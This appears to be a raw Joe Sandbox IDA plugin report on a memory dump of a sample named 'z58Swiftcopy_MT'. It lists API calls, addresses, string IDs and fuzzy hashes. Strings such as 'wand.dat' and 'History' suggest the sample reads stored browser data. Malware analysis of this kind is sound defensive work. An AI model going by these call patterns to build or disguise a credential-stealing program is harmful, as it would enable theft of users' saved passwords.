                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                                                                                                                                                      • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MetricsSystem$PlacementWindow
                                                                                                                                                                                                                                      • String ID: AE
                                                                                                                                                                                                                                      • API String ID: 3548547718-685266089
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memicmpwcslen
                                                                                                                                                                                                                                      • String ID: @@@@$History
                                                                                                                                                                                                                                      • API String ID: 1872909662-685208920
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                                      • String ID: </%s>
                                                                                                                                                                                                                                      • API String ID: 3400436232-259020660
                                                                                                                                                                                                                                      • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                                                                                                                                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSendmemset
                                                                                                                                                                                                                                      • String ID: AE$"
                                                                                                                                                                                                                                      • API String ID: 568519121-1989281832
                                                                                                                                                                                                                                      • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                                                                                                                                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                                      • String ID: caption
                                                                                                                                                                                                                                      • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                                      • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                                                                                                                                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                                                                                                      • API String ID: 210187428-168460110
                                                                                                                                                                                                                                      • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                                                                                                                                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                                      • API String ID: 2747424523-2167791130
                                                                                                                                                                                                                                      • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                                                                                                                                      • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                                      • API String ID: 3150196962-1506664499
                                                                                                                                                                                                                                      • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                                                                                                      • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memcmp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3384217055-0
                                                                                                                                                                                                                                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                                                                                      • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                                                                                                                                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                                                                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                                                                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                                                                      • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1889144086-0
                                                                                                                                                                                                                                      • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                                      • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1661045500-0
                                                                                                                                                                                                                                      • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                                      • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                                                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                                                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                                      • API String ID: 1297977491-2063813899
                                                                                                                                                                                                                                      • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                                      • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                                      • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                                                      • API String ID: 2618321458-1828844352
                                                                                                                                                                                                                                      • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                                                                                                                                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                                                                      • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1549203181-0
                                                                                                                                                                                                                                      • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                                                                                                                                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
